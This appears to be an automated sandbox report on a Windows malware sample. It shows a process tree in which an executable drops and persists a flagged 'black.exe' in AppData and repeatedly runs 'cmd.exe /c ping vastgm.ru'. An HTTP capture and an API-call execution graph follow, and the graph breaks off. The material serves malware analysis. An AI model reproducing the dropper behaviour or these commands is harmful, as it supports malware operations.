    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
2024-12-09 06:03:47 UTC | 3388 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
2024-12-09 06:03:47 UTC | 280 | IN | Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns
2024-12-09 06:03:47 UTC | 1370 | IN | Data Ascii: github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <li
2024-12-09 06:03:47 UTC | 884 | IN | Data Ascii: rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-70097f75aec1.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_
2024-12-09 06:03:47 UTC | 1370 | IN |
                                                Data Ascii: rel="stylesheet" href="https://github.githubassets.com/assets/primer-primitives-52ea80b74554.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-af846850481e.css" /> <link crossori
                                                2024-12-09 06:03:47 UTC1370INData Raw: 74 65 22 2c 22 6c 69 66 65 63 79 63 6c 65 5f 6c 61 62 65 6c 5f 6e 61 6d 65 5f 75 70 64 61 74 65 73 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 77 70 2d 72 75 6e 74 69 6d 65 2d 30 64 61 33 30 61 30 34 30 30 38 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d
                                                Data Ascii: te","lifecycle_label_name_updates"]}</script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-0da30a040080.js"></script><script crossorigin="anonymous" defer="defer" type=
                                                2024-12-09 06:03:47 UTC1370INData Raw: 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 36 64 33 39 36 37 61 63 64 35 31 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                                Data Ascii: st_index_esm_js-f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js"></script><
                                                2024-12-09 06:03:47 UTC1370INData Raw: 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 33 38 31 61 34 66 2d 35 39 39 32 35 38 33 32 66 37 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 39 30 32 37 31 33 62 32 36 39 65 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69
                                                Data Ascii: nt-element_dist_index_js-node_modules_primer_view-co-381a4f-59925832f779.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-902713b269e2.js"></script><scri
                                                2024-12-09 06:03:47 UTC1370INData Raw: 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 38 39 33 66 39 66 2d 36 63 66 33 33 32 30 34 31 36 62 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                                Data Ascii: avascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                                2024-12-09 06:03:47 UTC140INData Raw: 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 61 6a 61 78 2d 65 72 72 6f 72 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 64 30 64 30 61 36 2d 38 33 30 33 37 36 32 34 34 36 39 31 2e 6a 73 22 3e 3c 2f 73 63
                                                Data Ascii: assets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-830376244691.js"></sc


                                                Target ID:0
                                                Start time:01:03:37
                                                Start date:09/12/2024
                                                Path:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\Y5kEUsYDFr.exe"
                                                Imagebase:0x7ff6ca9c0000
                                                File size:912'111 bytes
                                                MD5 hash:EC773998B0078CC58100FDB4D27DC3F4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:1
                                                Start time:01:03:37
                                                Start date:09/12/2024
                                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe"
                                                Imagebase:0x120000
                                                File size:550'912 bytes
                                                MD5 hash:09929B04B0C29E2722009F49FAF7183C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 34%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                Target ID:2
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:01:03:50
                                                Start date:09/12/2024
                                                Path:C:\Users\user\AppData\Roaming\black.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\black.exe"
                                                Imagebase:0x300000
                                                File size:550'912 bytes
                                                MD5 hash:09929B04B0C29E2722009F49FAF7183C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 34%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                Target ID:9
                                                Start time:01:03:53
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:01:03:53
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:01:03:56
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:01:04:18
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
                                                Imagebase:0x7ff6bc1b0000
                                                File size:5'641'176 bytes
                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:23
                                                Start time:01:04:39
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:26
                                                Start time:01:04:43
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:36
                                                Start time:01:06:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:37
                                                Start time:01:06:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:38
                                                Start time:01:06:47
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:39
                                                Start time:01:06:54
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:40
                                                Start time:01:06:54
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:41
                                                Start time:01:06:59
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:11.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:28%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:26
25599->25601 25600->25568 25604 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 25601->25604 25603 7ff6ca9fd931 GetLastError 25603->25600 25604->25603 25605->25472 25607 7ff6ca9eb190 25942 7ff6ca9c255c 25607->25942 25609 7ff6ca9eb1db 25610 7ff6ca9ebe93 25609->25610 25611 7ff6ca9eb1ef 25609->25611 25619 7ff6ca9eb20c 25609->25619 26218 7ff6ca9ef390 25610->26218 25614 7ff6ca9eb1ff 25611->25614 25615 7ff6ca9eb2db 25611->25615 25611->25619 25614->25619 25627 7ff6ca9daae0 48 API calls 25614->25627 25621 7ff6ca9eb391 25615->25621 25625 7ff6ca9eb2f5 25615->25625 25616 7ff6ca9f2320 _handle_error 8 API calls 25620 7ff6ca9ec350 25616->25620 25617 7ff6ca9ebeba SendMessageW 25618 7ff6ca9ebec9 25617->25618 25623 7ff6ca9ebed5 SendDlgItemMessageW 25618->25623 25624 7ff6ca9ebef0 GetDlgItem SendMessageW 25618->25624 25619->25616 25950 7ff6ca9c22bc GetDlgItem 25621->25950 25623->25624 26238 7ff6ca9d62dc GetCurrentDirectoryW 25624->26238 25629 7ff6ca9daae0 48 API calls 25625->25629 25631 7ff6ca9eb236 25627->25631 25633 7ff6ca9eb313 SetDlgItemTextW 25629->25633 25630 7ff6ca9eb3b1 25660 7ff6ca9c1fa0 31 API calls 25630->25660 26252 7ff6ca9c1ec4 34 API calls _handle_error 25631->26252 25632 7ff6ca9ebf47 GetDlgItem 26248 7ff6ca9c2520 25632->26248 25636 7ff6ca9eb326 25633->25636 25636->25619 25646 7ff6ca9eb340 GetMessageW 25636->25646 25637 7ff6ca9eb408 GetDlgItem 25640 7ff6ca9eb422 SendMessageW SendMessageW 25637->25640 25641 7ff6ca9eb44f SetFocus 25637->25641 25638 7ff6ca9eb246 25644 7ff6ca9eb25c 25638->25644 25650 7ff6ca9c250c SetDlgItemTextW 25638->25650 25640->25641 25642 7ff6ca9eb465 25641->25642 25643 7ff6ca9eb4f2 25641->25643 25649 7ff6ca9daae0 48 API calls 25642->25649 26253 7ff6ca9c8d04 33 API calls 2 library calls 25643->26253 25644->25619 25662 7ff6ca9ec363 25644->25662 25646->25619 25652 7ff6ca9eb35e IsDialogMessageW 25646->25652 25648 7ff6ca9eb3f5 25648->25630 25655 7ff6ca9daae0 48 API calls 25648->25655 25656 7ff6ca9eb46f 25649->25656 25650->25644 25652->25636 25653 
7ff6ca9eb373 TranslateMessage DispatchMessageW 25652->25653 25653->25636 25654 7ff6ca9eb52c 26254 7ff6ca9eef80 33 API calls 2 library calls 25654->26254 25659 7ff6ca9ebcd6 SetDlgItemTextW 25655->25659 25964 7ff6ca9c129c 25656->25964 25664 7ff6ca9daae0 48 API calls 25659->25664 25660->25619 25665 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25662->25665 25663 7ff6ca9eb537 25668 7ff6ca9daae0 48 API calls 25663->25668 25669 7ff6ca9ebd08 25664->25669 25671 7ff6ca9ec368 25665->25671 25674 7ff6ca9eb555 25668->25674 25685 7ff6ca9c129c 33 API calls 25669->25685 25681 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25671->25681 25678 7ff6ca9dda98 48 API calls 25674->25678 25675 7ff6ca9eb498 25974 7ff6ca9ef0a4 25675->25974 25683 7ff6ca9eb568 25678->25683 25687 7ff6ca9ec36e 25681->25687 25692 7ff6ca9ef0a4 24 API calls 25683->25692 25719 7ff6ca9ebd31 25685->25719 25699 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25687->25699 25695 7ff6ca9eb578 25692->25695 25707 7ff6ca9c1fa0 31 API calls 25695->25707 25697 7ff6ca9ebdda 25701 7ff6ca9daae0 48 API calls 25697->25701 25704 7ff6ca9ec374 25699->25704 25700 7ff6ca9eb5ec 25712 7ff6ca9eb61a 25700->25712 25988 7ff6ca9d32a8 25700->25988 25714 7ff6ca9ebde4 25701->25714 25702 7ff6ca9eb4e8 25702->25700 26255 7ff6ca9efa80 33 API calls 2 library calls 25702->26255 25722 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25704->25722 25717 7ff6ca9eb586 25707->25717 26008 7ff6ca9d2f58 25712->26008 25736 7ff6ca9c129c 33 API calls 25714->25736 25717->25687 25717->25702 25719->25697 25730 7ff6ca9c129c 33 API calls 25719->25730 25728 7ff6ca9ec37a 25722->25728 25740 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25728->25740 25731 7ff6ca9ebd7f 25730->25731 25737 7ff6ca9daae0 48 API calls 25731->25737 25734 7ff6ca9eb634 GetLastError 25735 7ff6ca9eb64c 25734->25735 26020 7ff6ca9d7fc4 25735->26020 25739 7ff6ca9ebe0d 25736->25739 25742 7ff6ca9ebd8a 25737->25742 25752 7ff6ca9c129c 33 
API calls 25739->25752 25746 7ff6ca9ec380 25740->25746 25747 7ff6ca9c1150 33 API calls 25742->25747 25753 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25746->25753 25755 7ff6ca9ebda2 25747->25755 25748 7ff6ca9eb65e 25750 7ff6ca9eb674 25748->25750 25751 7ff6ca9eb665 GetLastError 25748->25751 25756 7ff6ca9eb71c 25750->25756 25760 7ff6ca9eb72b 25750->25760 25761 7ff6ca9eb68b GetTickCount 25750->25761 25751->25750 25757 7ff6ca9ebe4e 25752->25757 25758 7ff6ca9ec386 25753->25758 26286 7ff6ca9c2034 25755->26286 25756->25760 25777 7ff6ca9ebb79 25756->25777 25773 7ff6ca9c1fa0 31 API calls 25757->25773 25762 7ff6ca9c255c 61 API calls 25758->25762 25764 7ff6ca9eba50 25760->25764 26256 7ff6ca9d6454 25760->26256 26023 7ff6ca9c4228 25761->26023 25767 7ff6ca9ec3e4 25762->25767 25763 7ff6ca9ebdbe 25769 7ff6ca9c1fa0 31 API calls 25763->25769 25764->25630 26280 7ff6ca9cbd0c 33 API calls 25764->26280 25780 7ff6ca9ec489 GetDlgItem SetFocus 25767->25780 25802 7ff6ca9ec3fd 25767->25802 25807 7ff6ca9ec3e8 25767->25807 25774 7ff6ca9ebdcc 25769->25774 25779 7ff6ca9ebe78 25773->25779 25782 7ff6ca9c1fa0 31 API calls 25774->25782 25775 7ff6ca9eb74e 26268 7ff6ca9db914 102 API calls 25775->26268 25791 7ff6ca9daae0 48 API calls 25777->25791 25778 7ff6ca9eba75 26281 7ff6ca9c1150 25778->26281 25787 7ff6ca9c1fa0 31 API calls 25779->25787 25784 7ff6ca9ec4ba 25780->25784 25781 7ff6ca9f2320 _handle_error 8 API calls 25788 7ff6ca9eca97 25781->25788 25782->25697 25797 7ff6ca9c129c 33 API calls 25784->25797 25785 7ff6ca9eb6ba 25790 7ff6ca9c1fa0 31 API calls 25785->25790 25793 7ff6ca9ebe83 25787->25793 25789 7ff6ca9eb768 25796 7ff6ca9dda98 48 API calls 25789->25796 25798 7ff6ca9eb6c8 25790->25798 25799 7ff6ca9ebba7 SetDlgItemTextW 25791->25799 25792 7ff6ca9eba8a 25800 7ff6ca9daae0 48 API calls 25792->25800 25801 7ff6ca9c1fa0 31 API calls 25793->25801 25794 7ff6ca9ec434 SendDlgItemMessageW 25794->25807 25803 7ff6ca9eb7aa GetCommandLineW 25796->25803 25804 7ff6ca9ec4cc 25797->25804 26033 
7ff6ca9d2134 25798->26033 25805 7ff6ca9c2534 25799->25805 25806 7ff6ca9eba97 25800->25806 25801->25630 25802->25794 25802->25807 25808 7ff6ca9eb84f 25803->25808 25809 7ff6ca9eb869 25803->25809 26290 7ff6ca9d80d8 33 API calls 25804->26290 25811 7ff6ca9ebbc5 SetDlgItemTextW GetDlgItem 25805->25811 25812 7ff6ca9c1150 33 API calls 25806->25812 25807->25781 26269 7ff6ca9c20b0 25808->26269 26273 7ff6ca9eab54 33 API calls _handle_error 25809->26273 25817 7ff6ca9ebc13 25811->25817 25818 7ff6ca9ebbf0 GetWindowLongPtrW SetWindowLongPtrW 25811->25818 25813 7ff6ca9ebaaa 25812->25813 25819 7ff6ca9c1fa0 31 API calls 25813->25819 25815 7ff6ca9ec4e0 25822 7ff6ca9c250c SetDlgItemTextW 25815->25822 26053 7ff6ca9ece88 25817->26053 25818->25817 25826 7ff6ca9ebab5 25819->25826 25821 7ff6ca9eb87a 26274 7ff6ca9eab54 33 API calls _handle_error 25821->26274 25830 7ff6ca9ec4f4 25822->25830 25824 7ff6ca9eb704 26049 7ff6ca9d204c 25824->26049 25825 7ff6ca9eb6f5 GetLastError 25825->25824 25832 7ff6ca9c1fa0 31 API calls 25826->25832 25839 7ff6ca9ec526 SendDlgItemMessageW FindFirstFileW 25830->25839 25836 7ff6ca9ebac3 25832->25836 25833 7ff6ca9ece88 160 API calls 25837 7ff6ca9ebc3c 25833->25837 25834 7ff6ca9eb88b 26275 7ff6ca9eab54 33 API calls _handle_error 25834->26275 25847 7ff6ca9daae0 48 API calls 25836->25847 26204 7ff6ca9ef974 25837->26204 25843 7ff6ca9ec57b 25839->25843 25935 7ff6ca9eca04 25839->25935 25842 7ff6ca9eb89c 26276 7ff6ca9db9b4 102 API calls 25842->26276 25853 7ff6ca9daae0 48 API calls 25843->25853 25846 7ff6ca9eca81 25846->25807 25851 7ff6ca9ebadb 25847->25851 25848 7ff6ca9ece88 160 API calls 25864 7ff6ca9ebc6a 25848->25864 25849 7ff6ca9eb8b3 26277 7ff6ca9efbdc 33 API calls 25849->26277 25850 7ff6ca9ecaa9 25854 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25850->25854 25863 7ff6ca9c129c 33 API calls 25851->25863 25857 7ff6ca9ec59e 25853->25857 25858 7ff6ca9ecaae 25854->25858 25855 7ff6ca9ebc96 26285 7ff6ca9c2298 GetDlgItem EnableWindow 25855->26285 25856 
7ff6ca9eb8d2 CreateFileMappingW 25860 7ff6ca9eb953 ShellExecuteExW 25856->25860 25861 7ff6ca9eb911 MapViewOfFile 25856->25861 25865 7ff6ca9c129c 33 API calls 25857->25865 25866 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25858->25866 25871 7ff6ca9eb974 25860->25871 26278 7ff6ca9f3640 25861->26278 25877 7ff6ca9ebb04 25863->25877 25864->25855 25867 7ff6ca9ece88 160 API calls 25864->25867 25868 7ff6ca9ec5cd 25865->25868 25869 7ff6ca9ecab4 25866->25869 25867->25855 25870 7ff6ca9c1150 33 API calls 25868->25870 25875 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25869->25875 25872 7ff6ca9ec5e8 25870->25872 25873 7ff6ca9eb9c3 25871->25873 25874 7ff6ca9eb996 WaitForInputIdle 25871->25874 26291 7ff6ca9ce164 25872->26291 25884 7ff6ca9eb9ef 25873->25884 25885 7ff6ca9eb9dc UnmapViewOfFile CloseHandle 25873->25885 25879 7ff6ca9eb9ab 25874->25879 25880 7ff6ca9ecaba 25875->25880 25876 7ff6ca9ebb5a 25881 7ff6ca9c1fa0 31 API calls 25876->25881 25877->25728 25877->25876 25879->25873 25883 7ff6ca9eb9b1 Sleep 25879->25883 25888 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25880->25888 25881->25630 25882 7ff6ca9ec5ff 25886 7ff6ca9c1fa0 31 API calls 25882->25886 25883->25873 25883->25879 25884->25704 25887 7ff6ca9eba25 25884->25887 25885->25884 25889 7ff6ca9ec60c 25886->25889 25891 7ff6ca9c1fa0 31 API calls 25887->25891 25890 7ff6ca9ecac0 25888->25890 25889->25858 25893 7ff6ca9c1fa0 31 API calls 25889->25893 25894 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25890->25894 25892 7ff6ca9eba42 25891->25892 25895 7ff6ca9c1fa0 31 API calls 25892->25895 25896 7ff6ca9ec673 25893->25896 25897 